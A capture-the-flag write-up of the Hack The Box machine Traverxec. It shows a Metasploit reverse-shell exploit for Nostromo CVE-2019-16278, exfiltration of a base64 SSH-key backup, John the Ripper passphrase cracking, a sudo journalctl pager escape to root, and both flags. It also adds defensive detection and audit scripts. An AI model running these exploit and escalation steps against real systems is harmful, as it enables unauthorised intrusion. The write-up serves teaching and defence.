On 16 November last year, Hack The Box released the Linux machine Traverxec. It is rated “Easy”, a rating that indeed holds up after rooting it.

[0x1] Reconnaissance & Enumeration
As always, the new box starts with an Nmap scan of all ports, with script and service detection enabled.
nmap -sC -sV -p- -oA traverxec 10.10.10.165
Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-06 20:03 GMT
Stats: 0:02:29 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 35.05% done; ETC: 20:10 (0:04:36 remaining)
Stats: 0:04:51 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 62.21% done; ETC: 20:11 (0:02:57 remaining)
Nmap scan report for 10.10.10.165
Host is up (0.020s latency).
Not shown: 65533 filtered ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u1 (protocol 2.0)
| ssh-hostkey:
|   2048 aa:99:a8:16:68:cd:41:cc:f9:6c:84:01:c7:59:09:5c (RSA)
|   256 93:dd:1a:23:ee:d7:1f:08:6b:58:47:09:73:a3:88:cc (ECDSA)
|_  256 9d:d6:62:1e:7a:fb:8f:56:92:e6:37:f1:10:db:9b:ce (ED25519)
80/tcp open  http    nostromo 1.9.6
|_http-server-header: nostromo 1.9.6
|_http-title: TRAVERXEC
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 393.13 seconds
The scan shows two open ports: SSH on 22 (OpenSSH 7.9p1) and HTTP on 80, served by Nostromo 1.9.6. A quick check with searchsploit shows a known directory-traversal remote command execution for Nostromo (CVE-2019-16278, affecting 1.9.6 and earlier), with a ready-made Metasploit module.
searchsploit nostromo
--------------------------------------------------------------------- ----------------------------------------
Nostromo - Directory Traversal Remote Command Execution (Metasploit) | exploits/multiple/remote/47573.rb
[0x2] Initial foothold
Let’s fire up the good old msfconsole.
msfconsole
[ASCII banner: METASPLOIT CYBER MISSILE COMMAND V5]

       =[ metasploit v5.0.72-dev                          ]
+ -- --=[ 1962 exploits - 1095 auxiliary - 336 post       ]
+ -- --=[ 562 payloads - 45 encoders - 10 nops            ]
+ -- --=[ 7 evasion                                       ]
Before the Nostromo module was available I had to update Metasploit. On Kali this is done with apt install metasploit-framework (note the hyphen); if Metasploit is already installed, the package is simply upgraded to the latest version.
msf5 exploit(multi/http/nostromo_code_exec) > search nostromo

Matching Modules
================

   #  Name                                   Disclosure Date  Rank  Check  Description
   -  ----                                   ---------------  ----  -----  -----------
   0  exploit/multi/http/nostromo_code_exec  2019-10-20       good  Yes    Nostromo Directory Traversal Remote Command Execution
Only two options are really needed: RHOSTS with the IP address of the Traverxec box, and LHOST with your own VPN tunnel IP address (the tun0 interface), so the reverse shell can reach you.
msf5 > use exploit/multi/http/nostromo_code_exec
msf5 exploit(multi/http/nostromo_code_exec) > set RHOSTS 10.10.10.165
RHOSTS => 10.10.10.165
msf5 exploit(multi/http/nostromo_code_exec) > set LHOST 10.10.15.47
LHOST => 10.10.15.47
The exploit takes a few seconds to run, and afterwards you have a limited shell as the web server user www-data.
msf5 exploit(multi/http/nostromo_code_exec) > exploit

[*] Started reverse TCP handler on 10.10.15.47:4444
[*] Configuring Automatic (Unix In-Memory) target
[*] Sending cmd/unix/reverse_perl command payload
[*] Command shell session 1 opened (10.10.15.47:4444 -> 10.10.10.165:55468) at 2020-02-08 09:35:06 +0000

whoami
www-data
From within the Metasploit command shell session, the shell command looks for python on the target and uses it to spawn a proper interactive (pty) shell.
shell
[*] Trying to find binary(python) on target machine
[*] Found python at /usr/bin/python
[*] Using `python` to pop up an interactive shell
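From the defender's side, the traversal used above leaves a recognisable trace in the web server's access log: the public exploit (EDB 47573) inserts %0d between the dots so that Nostromo's literal check for "/../" never triggers, and the request targets /bin/sh. The following detection script is an added example and not part of the original write-up, Nostromo or Metasploit; the log lines are constructed in combined log format, so LOG_RE will need adapting to nhttpd's actual log layout. It decodes the request path (repeatedly, to catch double encoding), flags control characters, dot-dot segments that only appear after decoding, and requests aimed at a shell binary.

```python
"""Flag access-log requests that look like the Nostromo 1.9.6 traversal RCE
(CVE-2019-16278) used above.  Added example; log lines are constructed."""
import re
from urllib.parse import unquote

# Combined log format: client, ident, user, [timestamp], "request", status, size.
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) (?P<proto>[^"]+)" (?P<status>\d{3}) \S+'
)
# CR/LF and other control characters have no business in a URL path; the
# public exploit relies on %0d (CR) to slip past a naive "/../" filter.
CONTROL_CHARS = re.compile(r'[\x00-\x1f\x7f]')
SHELL_TARGETS = ('/bin/sh', '/bin/bash', '/bin/dash')

def decode_path(raw_path):
    """URL-decode the path (query string dropped), up to 3 rounds for double encoding."""
    path = raw_path.split('?', 1)[0]
    for _ in range(3):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return path

def traversal_indicators(raw_path):
    """Return the reasons a request path is suspicious (empty list if clean)."""
    reasons = []
    decoded = decode_path(raw_path)
    if CONTROL_CHARS.search(decoded):
        reasons.append('control character in path')
    # Remove the control characters the way a sloppy server might, then look
    # for '..' segments and shell binaries in what remains.
    cleaned = CONTROL_CHARS.sub('', decoded).replace('\\', '/')
    if '..' in cleaned.split('/'):
        reasons.append('dot-dot segment after decoding')
    if cleaned.endswith(SHELL_TARGETS):
        reasons.append('request targets a shell binary')
    return reasons

def scan_log(lines):
    """Parse log lines; return (client, raw path, reasons) for every hit."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # unparseable line, not this script's concern
        reasons = traversal_indicators(m.group('path'))
        if reasons:
            hits.append((m.group('client'), m.group('path'), reasons))
    return hits

# Constructed sample: a benign request, a CVE-2019-16278-style request and a
# double-encoded traversal (none of these are real log lines from the box).
SAMPLE_LOG = [
    '10.10.15.47 - - [08/Feb/2020:09:34:58 +0000] "GET /index.html HTTP/1.1" 200 1234',
    '10.10.15.47 - - [08/Feb/2020:09:35:06 +0000] "POST /.%0d./.%0d./.%0d./.%0d./bin/sh HTTP/1.0" 200 -',
    '10.10.15.99 - - [08/Feb/2020:09:36:00 +0000] "GET /icons/%252e%252e/%252e%252e/etc/passwd HTTP/1.1" 404 -',
]

if __name__ == '__main__':
    for client, path, reasons in scan_log(SAMPLE_LOG):
        print(f'{client} {path}: {", ".join(reasons)}')
```

Running it against the sample flags the second and third lines only. The same decode-then-inspect approach is what a WAF or a server-side path filter should do: reject after full decoding, not on the raw bytes.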
[0x3] Path to User flag
After poking around the machine and through Nostromo’s documentation, I found the configuration file where the options are stored. Ultimately, the public_www home directory feature turns out to be where the interesting information lives. Note that www-data cannot list David's home directory (it is traversable but not readable for other users), so you have to go straight to the full path rather than descending folder by folder.
cat /var/nostromo/conf/nhttpd.conf
# MAIN [MANDATORY]

servername              traverxec.htb
serverlisten            *
serveradmin             david@traverxec.htb
serverroot              /var/nostromo
servermimes             conf/mimes
docroot                 /var/nostromo/htdocs
docindex                index.html

# LOGS [OPTIONAL]

logpid                  logs/nhttpd.pid

# SETUID [RECOMMENDED]

user                    www-data

# BASIC AUTHENTICATION [OPTIONAL]

htaccess                .htaccess
htpasswd                /var/nostromo/conf/.htpasswd

# ALIASES [OPTIONAL]

/icons                  /var/nostromo/icons

# HOMEDIRS [OPTIONAL]

homedirs                /home
homedirs_public         public_www
While watching a YouTube video about Hack The Box, I came across a simple way to get a file from a remote session onto your own machine by copy/paste: base64-encode the file and copy the text. Here I do that with the gzipped tarball I found there.
base64 backup-ssh-identity-files.tgz
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
I paste the base64 data into the file backup_base64.txt and decode it into a new file backup.tgz (sudo is unnecessary here; a plain redirect does the job). Comparing a checksum such as md5sum or sha256sum of the archive on both sides is a cheap way to confirm nothing was lost or mangled in the paste.
base64 -d backup_base64.txt |sudo tee backup.tgz
The archive can now be extracted in the usual way, and David’s private and public SSH key appear, together with his authorized_keys file.
tar -zxf backup.tgz
ls
authorized_keys  id_rsa  id_rsa.pub
I prepare the captured private key for cracking with John the Ripper. For this I use ssh2john, a Python script that ships with John in /usr/share/john on Kali.
python /usr/share/john/ssh2john.py id_rsa > id_rsa_ready4john.txt
With the key converted into a hash John understands, I start a dictionary attack with the rockyou wordlist.
john --wordlist=/usr/share/wordlists/rockyou.txt id_rsa_ready4john.txt
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 4 OpenMP threads
Note: This format may emit false positives, so it will keep trying even after
finding a possible candidate.
Press 'q' or Ctrl-C to abort, almost any other key for status
hunter           (id_rsa)
Warning: Only 2 candidates left, minimum 4 needed for performance.
1g 0:00:00:05 DONE (2020-02-08 10:57) 0.1779g/s 2551Kp/s 2551Kc/s 2551KC/sa6_123..*7¡Vamos!
Session completed
John has no trouble with it: the passphrase falls within seconds. The two cost lines above explain why: the key is stored in the legacy PEM format, whose passphrase is stretched with a single MD5 round (cost 1 = MD5/AES, iteration count 1), so John tests roughly 2.5 million candidates per second. The passphrase is hunter.
john id_rsa_ready4john.txt --show
id_rsa:hunter
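Whether a leaked key is crackable at that rate depends entirely on its on-disk format, which can be read off the file before spending any time on John. The script below is an added example, not part of the write-up or of John; it inspects the two PEM-style formats OpenSSH writes: the legacy "BEGIN RSA PRIVATE KEY" format, where a DEK-Info header marks encryption with OpenSSL's single-round MD5 key derivation, and the "BEGIN OPENSSH PRIVATE KEY" format, whose base64 body starts with the openssh-key-v1 magic followed by cipher name, KDF name and bcrypt options (salt and round count). Both sample keys are constructed: the legacy body is filler and make_openssh_header builds only the unencrypted prefix of a v1 blob, which is all the inspector needs.

```python
"""Read an SSH private key's format and KDF to judge offline cracking cost.
Added example; the sample keys below are constructed, not real key material."""
import base64
import struct

OPENSSH_MAGIC = b'openssh-key-v1\0'

def _read_string(buf, off):
    """Read an SSH wire-format string (uint32 big-endian length + bytes)."""
    (n,) = struct.unpack('>I', buf[off:off + 4])
    return buf[off + 4:off + 4 + n], off + 4 + n

def inspect_private_key(pem_text):
    """Return format, cipher, KDF, round count and a cracking-cost verdict."""
    lines = [l.strip() for l in pem_text.strip().splitlines()]
    header, body = lines[0], lines[1:-1]
    info = {'format': None, 'encrypted': False, 'cipher': None, 'kdf': None, 'rounds': 0}

    if header == '-----BEGIN OPENSSH PRIVATE KEY-----':
        info['format'] = 'openssh-key-v1'
        blob = base64.b64decode(''.join(body))
        if not blob.startswith(OPENSSH_MAGIC):
            raise ValueError('bad openssh-key-v1 magic')
        off = len(OPENSSH_MAGIC)
        cipher, off = _read_string(blob, off)
        kdf, off = _read_string(blob, off)
        kdfopts, off = _read_string(blob, off)
        info['cipher'], info['kdf'] = cipher.decode(), kdf.decode()
        info['encrypted'] = cipher != b'none'
        if kdf == b'bcrypt':
            # kdfoptions for bcrypt: string salt, uint32 rounds
            _salt, o = _read_string(kdfopts, 0)
            (info['rounds'],) = struct.unpack('>I', kdfopts[o:o + 4])
    elif header.startswith('-----BEGIN ') and header.endswith(' PRIVATE KEY-----'):
        info['format'] = 'legacy-pem'
        # Encrypted legacy keys carry RFC 1421 headers before a blank line.
        for line in body:
            if line.startswith('DEK-Info:'):
                info['encrypted'] = True
                info['cipher'] = line.split(':', 1)[1].split(',')[0].strip()
                info['kdf'] = 'md5-evp-bytes-to-key'
                info['rounds'] = 1
    else:
        raise ValueError('not a PEM private key')

    if not info['encrypted']:
        info['verdict'] = 'unencrypted: usable as-is'
    elif info['format'] == 'legacy-pem':
        info['verdict'] = 'weak KDF: one MD5 round, millions of guesses per second offline'
    else:
        info['verdict'] = f"bcrypt with {info['rounds']} rounds: slow to crack"
    return info

def make_openssh_header(cipher=b'aes256-ctr', kdf=b'bcrypt', rounds=16):
    """Constructed sample: the unencrypted prefix of an openssh-key-v1 blob,
    with no key sections, which is enough for inspect_private_key."""
    def s(b):
        return struct.pack('>I', len(b)) + b
    kdfopts = s(b'\x00' * 16) + struct.pack('>I', rounds) if kdf == b'bcrypt' else b''
    blob = OPENSSH_MAGIC + s(cipher) + s(kdf) + s(kdfopts) + struct.pack('>I', 1)
    b64 = base64.b64encode(blob).decode()
    return f'-----BEGIN OPENSSH PRIVATE KEY-----\n{b64}\n-----END OPENSSH PRIVATE KEY-----\n'

# Constructed legacy-format sample with the headers ssh-keygen used to write;
# the body is filler, not a key.
LEGACY_SAMPLE = """-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,00112233445566778899AABBCCDDEEFF

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
-----END RSA PRIVATE KEY-----
"""

if __name__ == '__main__':
    for name, key in (('legacy', LEGACY_SAMPLE), ('openssh', make_openssh_header())):
        print(name, inspect_private_key(key))
```

The fix on the owning side is to regenerate or re-save keys in the new format with a meaningful round count (ssh-keygen -o -a 100 on older releases; current OpenSSH writes openssh-key-v1 with bcrypt by default), which turns a five-second dictionary run into one measured in hours per thousand guesses.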
With the private key I connect over SSH, which the Nmap scan showed is open, and enter the cracked passphrase when prompted. (If ssh refuses the key because the file permissions are too open, chmod 600 id_rsa first.) After that a prompt as david appears.
ssh -i id_rsa david@10.10.10.165
Enter passphrase for key 'id_rsa':
Linux traverxec 4.19.0-6-amd64 #1 SMP Debian 4.19.67-2+deb10u1 (2019-09-20) x86_64
Last login: Sat Feb  8 05:59:17 2020 from 10.10.15.230
david@traverxec:~$
A quick look at the home directory shows that user.txt is right there.
ls
bin  public_www  user.txt
So much for the user flag. But now time for the other half of the challenge. On to root!
cat user.txt
7db0b48469606a42cec20750d9782f3d
[0x4] Path to Root flag
Once in David’s home folder it is time to look around for new clues. The bin folder contains an interesting script that collects some server statistics and log data and prints them to the screen.
cat server-stats.sh
#!/bin/bash

cat /home/david/bin/server-stats.head
echo "Load: `/usr/bin/uptime`"
echo " "
echo "Open nhttpd sockets: `/usr/bin/ss -H sport = 80 | /usr/bin/wc -l`"
echo "Files in the docroot: `/usr/bin/find /var/nostromo/htdocs/ | /usr/bin/wc -l`"
echo " "
echo "Last 5 journal log lines:"
/usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service | /usr/bin/cat
The last line runs journalctl under sudo. journalctl is a so-called GTFOBin, a Linux binary with a documented way to abuse it for privilege escalation. Whenever I see a script running a command under sudo, one of my first actions is to look that command up on GTFOBins (https://gtfobins.github.io).

journalctl prints the latest entries from the journal daemon. When stdout is a terminal and the output does not fit on one screen, it hands the output to the pager (less), and from the less prompt you can run shell commands with !, which is the escape GTFOBins documents. In the script the output is piped through cat, which suppresses the pager, so the trick is to run the same sudo command directly, in a terminal small enough that the pager actually kicks in (less is started with -F and quits immediately if everything fits on one screen).
/usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service
-- Logs begin at Sat 2020-02-08 06:14
Feb 08 06:28:03 traverxec su[1297]: F
Feb 08 06:29:06 traverxec sudo[1370]:
Feb 08 06:29:20 traverxec sudo[1381]:
Feb 08 06:56:33 traverxec su[2396]: p
Feb 08 06:56:35 traverxec su[2396]: F
The command runs and the pager is now showing its output. Typing !/bin/sh at the less prompt spawns a shell, and because less was started by the sudo'd journalctl, that shell runs as root.
!/bin/sh
# whoami
root
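The root cause is not journalctl itself but a sudo rule that lets a user run a pager-capable command interactively. The following audit script is an added example, not part of the write-up; the sudoers lines it checks are constructed, and the first david rule mirrors the command the script above exercised (that it is NOPASSWD is an assumption, as the write-up never shows the rule itself). It parses user specifications, recognises commands that page through less when attached to a TTY (journalctl, systemctl, git, and less/more/man themselves, all GTFOBins entries), and reports rules that lack --no-pager or allow arbitrary arguments.

```python
"""Audit sudoers user specifications for commands that can drop into an
interactive pager, the root cause of the journalctl escape above.
Added example; the sudoers lines are constructed."""
import os
import re
import shlex

# Commands that hand their output to $PAGER/less when stdout is a TTY.
PAGER_COMMANDS = {'journalctl', 'systemctl', 'git', 'less', 'more', 'man'}
# Option that disables paging for journalctl, systemctl and git.
NO_PAGER_FLAGS = {'--no-pager'}

# user  host=(runas) [TAG:] command[, command...]
RULE_RE = re.compile(
    r'^(?P<user>[^\s#]+)\s+(?P<host>[^\s=]+)\s*=\s*'
    r'(?:\((?P<runas>[^)]*)\)\s*)?'
    r'(?P<rest>.+)$'
)

def parse_sudoers_rule(line):
    """Split one user specification into parts; None for comments/Defaults/blank."""
    line = line.strip()
    if not line or line.startswith('#') or line.startswith('Defaults'):
        return None
    m = RULE_RE.match(line)
    if not m:
        return None
    rest = m.group('rest')
    tags = []
    while True:  # leading tag specs such as NOPASSWD: or SETENV:
        tm = re.match(r'^([A-Z]+):\s*', rest)
        if not tm:
            break
        tags.append(tm.group(1))
        rest = rest[tm.end():]
    return {
        'user': m.group('user'),
        'host': m.group('host'),
        'runas': m.group('runas') or 'root',
        'tags': tags,
        'commands': [c.strip() for c in rest.split(',')],
    }

def pager_escape_risk(command):
    """Return a reason if the command can give the caller an interactive pager."""
    argv = shlex.split(command)
    if not argv:
        return None
    name = os.path.basename(argv[0])
    if name not in PAGER_COMMANDS:
        return None
    if name in ('less', 'more', 'man'):
        return f'{name} is itself a pager; "!" runs a shell as the run-as user'
    if NO_PAGER_FLAGS & set(argv[1:]):
        return None
    if command.endswith('*') or len(argv) == 1:
        return f'{name} allows arbitrary arguments, so paging cannot be prevented'
    return f'{name} pages output on a TTY; add --no-pager to the sudoers rule'

def audit_sudoers(lines):
    """Return (user, command, reason) for every rule that allows a pager escape."""
    findings = []
    for line in lines:
        rule = parse_sudoers_rule(line)
        if not rule:
            continue
        for cmd in rule['commands']:
            reason = pager_escape_risk(cmd)
            if reason:
                findings.append((rule['user'], cmd, reason))
    return findings

# Constructed sample; the first david line is the weak rule, the second its fix.
SAMPLE_SUDOERS = [
    '# User privilege specification',
    'Defaults env_reset',
    'root    ALL=(ALL:ALL) ALL',
    'david   ALL=(root) NOPASSWD: /usr/bin/journalctl -n5 -unostromo.service',
    'david   ALL=(root) NOPASSWD: /usr/bin/journalctl --no-pager -n5 -unostromo.service',
    'ops     ALL=(root) /usr/bin/systemctl status nostromo.service, /bin/less /var/log/syslog',
]

if __name__ == '__main__':
    for user, cmd, reason in audit_sudoers(SAMPLE_SUDOERS):
        print(f'{user}: {cmd}\n    {reason}')
```

For the box's rule the fix is the second david line: pin --no-pager into the sudoers command so the script keeps working while an interactive invocation never reaches less. The parser is deliberately simple (no aliases, no line continuations); run it over the output of sudo -l rather than over a complex sudoers tree.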
Once a root user, I look for the root.txt in the well-known place to see if the key is there, or if a new challenge presents itself.
cd /root
# ls
nostromo_1.9.6-1.deb  root.txt
Root-flag it is! Nice box and relatively easy to do for beginners. Learned another nice privilege escalation and on to the next machine!
# cat root.txt
9aa36a6d76f785dfd320a478f6e0d906